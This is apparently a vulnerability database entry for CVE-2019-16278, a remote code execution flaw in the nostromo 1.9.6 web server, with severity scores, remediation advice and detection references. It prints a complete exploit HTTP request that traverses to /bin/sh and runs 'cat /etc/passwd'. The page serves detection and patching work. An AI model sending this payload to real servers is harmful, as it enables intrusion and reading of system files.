🔙 목록으로 돌아가기

CVE-2019-16278: nostromo 1.9.6 - Remote Code Execution

Titlenostromo 1.9.6 - Remote Code Execution
Authorpikpikcu
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
RemediationUpgrade to a patched version of nostromo web server (1.9.7 or later) or apply the vendor-supplied patch.
CVSS Score9.8
EPSS Score0.94393
CVE IDCVE-2019-16278
CWE IDCWE-22
Tags cve cve2019 edb rce packetstorm nazgul kev vkev vuln

🔍 Vulnerability Description

nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify.

🌐 HTTP Request

POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
Connection: close
Content-Length: 32
Accept-Encoding: gzip

echo

echo

cat /etc/passwd 2>&1

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-16278.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-16278.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A